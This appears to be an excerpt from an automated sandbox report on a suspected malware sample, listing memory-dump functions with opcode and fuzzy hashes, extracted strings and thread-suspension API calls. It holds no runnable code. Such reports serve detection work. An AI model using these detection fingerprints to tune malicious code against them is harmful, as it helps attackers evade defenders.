                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba10000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 09c1a0d09ceb08a24077f193b0b2bbda5741c7cd5cfa3f94274386406f9d6f47
                                                                    • Instruction ID: f90811aa21c120178984b7e44949bf5d6bc57cf9cb44eac2a21985abe791a5d6
                                                                    • Opcode Fuzzy Hash: 09c1a0d09ceb08a24077f193b0b2bbda5741c7cd5cfa3f94274386406f9d6f47
                                                                    • Instruction Fuzzy Hash: A2F03030E0960E9FEBA0EFA8D4596ED77A0FF54304F114437E41CC21A0DAB466908784
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA106C8 Relevance: .0, Instructions: 30COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1671529877.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba10000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b94dc1544f300cac08faea14a2e802732c165fe4a4f2d9eb82a9dcd7fe1bfcac
                                                                    • Instruction ID: 5a8fc876a3f96475517f85b0bb0caaa7b3c0f8a4f5fbd39251bb484bd6a8820b
                                                                    • Opcode Fuzzy Hash: b94dc1544f300cac08faea14a2e802732c165fe4a4f2d9eb82a9dcd7fe1bfcac
                                                                    • Instruction Fuzzy Hash: F9F01230D5564D9FDF90EFA4C4596EE77E0FF14304F014466E81CD2160DA74A6A0CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA10B18 Relevance: .0, Instructions: 29COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1671529877.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba10000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: af2b0a52c4d7294d33ac9b2b8e7266c973831ff38da2575dc814cd1548b8acfa
                                                                    • Instruction ID: 78178833235a70377f40e6142ee6ac0d9cf5eb7070653fe98401cccc2114560d
                                                                    • Opcode Fuzzy Hash: af2b0a52c4d7294d33ac9b2b8e7266c973831ff38da2575dc814cd1548b8acfa
                                                                    • Instruction Fuzzy Hash: 9EF0F230508A0E8FDB90EF68C944AAA37A1FF28300F000165F41DC31A4CB70EAA0CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0F7635 Relevance: .0, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cff4bf6ecac6fe6f7e365ab24eac9dcbb89ac62d436fa80bcb1b13831970ddb9
                                                                    • Instruction ID: e569e73b3a502224f2d682ba9caac093db4251c2cacd046be82dd712e2aefc99
                                                                    • Opcode Fuzzy Hash: cff4bf6ecac6fe6f7e365ab24eac9dcbb89ac62d436fa80bcb1b13831970ddb9
                                                                    • Instruction Fuzzy Hash: 60E0DF31A1D38A8FD771DB58C8760EC7F30BF00340F5801EBD90C0A282EB646658A343
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0FF597 Relevance: .0, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 29956286d5117353e567719920c1964a721aa99d53a8e0228c4ea3020fa390b3
                                                                    • Instruction ID: ee8438d984e8e9f4080f7c5c0c84f4e8649c2065dc422c576d9976a074af2ea4
                                                                    • Opcode Fuzzy Hash: 29956286d5117353e567719920c1964a721aa99d53a8e0228c4ea3020fa390b3
                                                                    • Instruction Fuzzy Hash: 8DE0EC41F0D3834BF7375AE408710786AE09F47BC0F5509B6D24E8A2D3EB5829857311
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0F9E07 Relevance: .0, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 88416cfd3fcde41ef5bdda58b2569c73e4a862812a6abe7231dfe3a4a12010c9
                                                                    • Instruction ID: c0653e90ba0e9c979a92f7ae5ccb9fc9cb665ad5f55da62dbc2f4516e924fc06
                                                                    • Opcode Fuzzy Hash: 88416cfd3fcde41ef5bdda58b2569c73e4a862812a6abe7231dfe3a4a12010c9
                                                                    • Instruction Fuzzy Hash: 8FE01201F0D6835FE73657B448B55686FA19F0B3C4F1409B5D14E8B2D3DA583C95A711
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C10007B Relevance: .0, Instructions: 11COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 61a40d3cf6e15dab64fccae4e4d47597c5b5d6015f0e832f2ad277dff738981f
                                                                    • Instruction ID: be40a656338252bddf2c8df5b0eb0aafda97a35092a007a6aa351422e92255c4
                                                                    • Opcode Fuzzy Hash: 61a40d3cf6e15dab64fccae4e4d47597c5b5d6015f0e832f2ad277dff738981f
                                                                    • Instruction Fuzzy Hash: 81D0C922B0D60385F578C691403023911B15F017C0EE0403ED09F618E5CD1DB9826209
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0FA8DB Relevance: .0, Instructions: 11COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f5c8676b47044bbb3c5db7628fae0690d09d220f5ca17a06c309ede9dc85c081
                                                                    • Instruction ID: 9b6821ab95b6d3b2f4c06137f7d173cffe41390d8cd557d507e8a1d038e5f2a9
                                                                    • Opcode Fuzzy Hash: f5c8676b47044bbb3c5db7628fae0690d09d220f5ca17a06c309ede9dc85c081
                                                                    • Instruction Fuzzy Hash: 0DD09210F0C60B89F1385681417023A21B1AF40380E20407AC05F418C18B5C7AC3B601
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 00007FFD9BBC09BE Relevance: 142.5, Strings: 112, Instructions: 2489COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1674632989.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bbc0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $!$"$#$$$%$&$'$($)$*$+$,$-$.$/$/EUz$0$1$2$3$4$5$6$7$8$9$:$;$<$=$>$?$@$A$B$C$D$D uM$D uM$E$F$G$H$I$J$K$L$M$N$O$P$Q$R$S$T$U$V$W$X$Y$Z$[$\$]$^$_$`$a$alZi$b$c$d$e$f$g$h$h&E$h&E$i$j$k$l$m$n$o$p$q$r$s$t$t`$t`$u$v$w$x$y$z${$|$}$~$fC$+mB$+mB$+mB$E![$E![$fD$fD$fD
                                                                    • API String ID: 0-81692576
                                                                    • Opcode ID: 832c675c87528e877e868e30bbd9b34bfb8bf8bdd5e31f17dff1f368f1324c3a
                                                                    • Instruction ID: 3f30a366d99860e128678c1f44fdfc1486742f2dd81bf68ef0764870e54613e9
                                                                    • Opcode Fuzzy Hash: 832c675c87528e877e868e30bbd9b34bfb8bf8bdd5e31f17dff1f368f1324c3a
                                                                    • Instruction Fuzzy Hash: 6143F774A155298FEBA4EB28C8A9BA973B1FF48744F4101F9D40EA7295CF356E80CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBD6179 Relevance: 4.2, Strings: 3, Instructions: 415COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1674632989.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bbc0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0_I$0_I$0_I
                                                                    • API String ID: 0-3182682118
                                                                    • Opcode ID: 92b9a19e0af4b76a20f089bc2fe4a9670c8dd39cfdf2d26c0bbc24d8c72fb28e
                                                                    • Instruction ID: c955ca34f751fae339b0bb3c4b4aeb4806e03511e286879c78fe2d7fd513aba2
                                                                    • Opcode Fuzzy Hash: 92b9a19e0af4b76a20f089bc2fe4a9670c8dd39cfdf2d26c0bbc24d8c72fb28e
                                                                    • Instruction Fuzzy Hash: 7ED10893B0FAC60BE36545BC48361657F5ABFD259470A42FBD0854F0FBA82ABE05C385
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBD55D4 Relevance: 2.9, Strings: 2, Instructions: 422COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1674632989.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bbc0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0_I$0_I
                                                                    • API String ID: 0-1343597779
                                                                    • Opcode ID: 509c2325a40287a25e06fb4ce852e27264e63052942868cd61deeb60dc7337e9
                                                                    • Instruction ID: 99cf546418fde866de8171efbbce7ad48dbb3f1bd5e82dd35f983a11e81fcbb8
                                                                    • Opcode Fuzzy Hash: 509c2325a40287a25e06fb4ce852e27264e63052942868cd61deeb60dc7337e9
                                                                    • Instruction Fuzzy Hash: 24E1B78770FBC61BE76285B848291555F9B7F9219475E40FBC0944F0FBA42EFA18C346
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBD6C80 Relevance: .3, Instructions: 267COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1674632989.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bbc0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9e56b45e7dcdd7226b28eb71971761ce1785918cbe81723c78c26dafeda8b326
                                                                    • Instruction ID: d10c76ae2c30afe14bd0103984e316358c216f6bb82a20719284d03b10f68349
                                                                    • Opcode Fuzzy Hash: 9e56b45e7dcdd7226b28eb71971761ce1785918cbe81723c78c26dafeda8b326
                                                                    • Instruction Fuzzy Hash: 3091D393B0FAD10BE77646AA58351656F53BBE2590B0A01FFD0C50A1FB642AFE05C385
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBD761C Relevance: .3, Instructions: 255COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1674632989.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bbc0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 809816ed15c6856f4b9c3bf022d7546fb31162ff4b235ca12c5c43ccd4b53d1e
                                                                    • Instruction ID: e65b96820801f47b1aee92c27fb306a6054d412348502a8b39fc4820443248fa
                                                                    • Opcode Fuzzy Hash: 809816ed15c6856f4b9c3bf022d7546fb31162ff4b235ca12c5c43ccd4b53d1e
                                                                    • Instruction Fuzzy Hash: 5F818443B0F29717F3127779A8B5CE62FD0AF4226C71E02F6D49D4E0E39C1E6A498245
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBD5A00 Relevance: .2, Instructions: 233COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1674632989.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bbc0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ad83c76174b20a645da327a29a6657d23f80749150d8572f57c0a4783cfab878
                                                                    • Instruction ID: 8372c34146f3dafff71ded767415d39d0db9a4ce54d6df5c578455d1620ebb16
                                                                    • Opcode Fuzzy Hash: ad83c76174b20a645da327a29a6657d23f80749150d8572f57c0a4783cfab878
                                                                    • Instruction Fuzzy Hash: A381D6D370FBCA1BE37146A808751796E9B7FA2150B0E52FBD4D40B0EBA41AFA19C345
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBD4CA1 Relevance: .2, Instructions: 230COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1674632989.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bbc0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b9f6349297b46e7ba580c3011ca4f9c2029fdfef9bc0819ba90979de2bdc6897
                                                                    • Instruction ID: 2905b5bacf85a3a0b0a43849649f4d202af0d65621a5cb919378c52d54e7e841
                                                                    • Opcode Fuzzy Hash: b9f6349297b46e7ba580c3011ca4f9c2029fdfef9bc0819ba90979de2bdc6897
                                                                    • Instruction Fuzzy Hash: EA81E883B0FAD627F366567848791E56F46BF9219470E41FEC0D80F0E7982ABE19C385
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBD4D31 Relevance: .2, Instructions: 214COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1674632989.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bbc0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 83d018e812aeee7f0a5b9cb8ddef131f2ca86e266deb37ab1b4a44e43cedfd96
                                                                    • Instruction ID: 0a18a1bab15d2dea5c5b36e7f5894a3e80f8f6f21b640838ad184e26feac9e5d
                                                                    • Opcode Fuzzy Hash: 83d018e812aeee7f0a5b9cb8ddef131f2ca86e266deb37ab1b4a44e43cedfd96
                                                                    • Instruction Fuzzy Hash: 9E71D783B0FAD627F366527848791E56F46BF9219470A01FED4D80F0F7942ABE19C385
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBD3600 Relevance: .2, Instructions: 196COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1674632989.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bbc0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2add28cdd1a456be69398159c8fdb4106d331bd3ac8cf30071be0efa57b01440
                                                                    • Instruction ID: 345775fc13b1954bf799041a7fcf06344ab39ff02ceb1b1a45817b4ed1542640
                                                                    • Opcode Fuzzy Hash: 2add28cdd1a456be69398159c8fdb4106d331bd3ac8cf30071be0efa57b01440
                                                                    • Instruction Fuzzy Hash: 0861D9A3F0FBD50FE3665BBC48650257EA2BF8629435A01FBD1844A1FBB52AE905C341
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBD4D12 Relevance: .2, Instructions: 181COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1674632989.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bbc0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 52691df8b4eff3a6df73136bc08db7b360448caaf931d96caaffe60ac3534eeb
                                                                    • Instruction ID: 4cba0d98b1da33c215bfc710a4414e75b366633210a44a00f383ec2de83f77c6
                                                                    • Opcode Fuzzy Hash: 52691df8b4eff3a6df73136bc08db7b360448caaf931d96caaffe60ac3534eeb
                                                                    • Instruction Fuzzy Hash: E751B7C3B0FAD61BF766467808391A56E4ABFD219474A05FED0D40B0F7A42EBE15C285
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBD4F51 Relevance: .2, Instructions: 158COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1674632989.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bbc0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ed7e601ae59f7cb6e3d3b6aab0e1638b1818c3557117b459e82ab4a7a9793093
                                                                    • Instruction ID: efaa9b607d9d83efa76c7c9106d0e76e99c407a3d3342171d58bc8c5e8275628
                                                                    • Opcode Fuzzy Hash: ed7e601ae59f7cb6e3d3b6aab0e1638b1818c3557117b459e82ab4a7a9793093
                                                                    • Instruction Fuzzy Hash: 7251B193B0FBC50FE32242B854765A96F56BF82154B1A01FBD4D80F0F7951AAE19C385
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBD4978 Relevance: .2, Instructions: 155COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1674632989.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bbc0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b9bc50ba54e984b4b53c9db07d3ccbd49515ab7b4a065505b93dd3ecd990ddc9
                                                                    • Instruction ID: 19c6458a5b976189ef3439e150b978d69bc7aee1f1bd24bafbd46002229486c2
                                                                    • Opcode Fuzzy Hash: b9bc50ba54e984b4b53c9db07d3ccbd49515ab7b4a065505b93dd3ecd990ddc9
                                                                    • Instruction Fuzzy Hash: 6E510743B0F6C22AE322937884B65E66F566F5215471A41FED4D90F4EBA41EBD0CC389
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBD7444 Relevance: .2, Instructions: 153COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1674632989.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bbc0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1cd1fd63a427ef18f306c402901f2bb05098730084008fa0ee392691a7130901
                                                                    • Instruction ID: bd7e6f89feee3bbe95332d75b777068345421b9ef5612ac432bdb102b35422f6
                                                                    • Opcode Fuzzy Hash: 1cd1fd63a427ef18f306c402901f2bb05098730084008fa0ee392691a7130901
                                                                    • Instruction Fuzzy Hash: B751C543F0F6D75BE322B36998B58E62F806F1322C71E42F6D48E0E0E39C1E66498255
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBD7384 Relevance: .1, Instructions: 136COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1674632989.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bbc0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: aed1023b7e90ba27b1a2f8497f5468c7c9a2e0ae1fb60e0f81ccab9667c9c83b
                                                                    • Instruction ID: 807acd6a14bf5177ae8649e5b90bf246041a68f89fb04341af53ca5accd6342e
                                                                    • Opcode Fuzzy Hash: aed1023b7e90ba27b1a2f8497f5468c7c9a2e0ae1fb60e0f81ccab9667c9c83b
                                                                    • Instruction Fuzzy Hash: 51419343B0F6D75BE322B77998B58E62F806F0321C71E42F6E49E4A0E3D81E65498255
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBC000A Relevance: .1, Instructions: 120COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1674632989.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bbc0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1b4385d079157c7a9353188476001a9ac54bc50ec68c454e407e654146ff6f78
                                                                    • Instruction ID: 2e1a4a48a24265056a65404d4dd6d00cfc6ee3c75838c52d2207a104afe44a1e
                                                                    • Opcode Fuzzy Hash: 1b4385d079157c7a9353188476001a9ac54bc50ec68c454e407e654146ff6f78
                                                                    • Instruction Fuzzy Hash: 4B413726A0E7C65ED723A77498B14E07F70AE0320831E45F7C4D9CE4E3DA1AA809C792
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBCD16D Relevance: .1, Instructions: 99COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1674632989.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bbc0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: dd97ad550a3ebb49e65f21623aacaa93edb28d3bbbb9689c2fe30d4273260132
                                                                    • Instruction ID: a2acb3bbc8ec8eafc84bad60d9f3f34760c377233ff7270f87c7a8f01357a3bb
                                                                    • Opcode Fuzzy Hash: dd97ad550a3ebb49e65f21623aacaa93edb28d3bbbb9689c2fe30d4273260132
                                                                    • Instruction Fuzzy Hash: 7F310674E18A1D8FCF84EF98D491AEDBBF1FB69300F2011AAD419E7291CB35A941CB44
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:3%
                                                                    Dynamic/Decrypted Code Coverage:83.3%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:12
                                                                    Total number of Limit Nodes:0
                                                                    execution_graph 19175 7ffd9bbb1f85 19176 7ffd9bbb1f9f GetFileAttributesW 19175->19176 19178 7ffd9bbb2065 19176->19178 19167 7ffd9bbb02f9 19168 7ffd9bbb0307 FindCloseChangeNotification 19167->19168 19170 7ffd9bbb03e4 19168->19170 19179 7ffd9bbb0190 19180 7ffd9bbb019a ResumeThread 19179->19180 19182 7ffd9bbb02a4 19180->19182 19171 7ffd9bbaeaad 19172 7ffd9bbaeabb SuspendThread 19171->19172 19174 7ffd9bbaeb94 19172->19174

                                                                    Executed Functions

                                                                    Function 00007FFD9B9F0DA8 Relevance: .3, Instructions: 302COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 353 7ffd9b9f0da8-7ffd9b9f0dbf 354 7ffd9b9f0dc1 353->354 355 7ffd9b9f0dc2-7ffd9b9f0df9 353->355 354->355 357 7ffd9b9f0dfb 355->357 358 7ffd9b9f0e00-7ffd9b9f0eb7 call 7ffd9b9f07d0 355->358 357->358 371 7ffd9b9f0eb9-7ffd9b9f0ece 358->371 372 7ffd9b9f0ecf-7ffd9b9f0f37 358->372 371->372 379 7ffd9b9f0f38-7ffd9b9f0fa8 372->379 386 7ffd9b9f0faa-7ffd9b9f0fb0 379->386 387 7ffd9b9f0fc0-7ffd9b9f0fc1 379->387 388 7ffd9b9f0fb2 386->388 387->388 389 7ffd9b9f0fc3-7ffd9b9f0fe3 387->389 388->379 390 7ffd9b9f0fb4-7ffd9b9f0fbe 388->390 393 7ffd9b9f0feb-7ffd9b9f10dc 389->393 390->387
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 24d9789df1320439b16a85b784e7f4f374483bde01c39f74cb828b1b81d01323
                                                                    • Instruction ID: 32f99b1682eb95844cb81338240519462ef645d73c88a7db4cdcae4ef657d908
                                                                    • Opcode Fuzzy Hash: 24d9789df1320439b16a85b784e7f4f374483bde01c39f74cb828b1b81d01323
                                                                    • Instruction Fuzzy Hash: C9A1CE75B19A8D8FE798EF68C8647A97FE1FF95310F1001BAD049D72E6CA782901CB10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9B9F0B47 Relevance: 2.6, Strings: 2, Instructions: 73COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: c9$!k9
                                                                    • API String ID: 0-3254877420
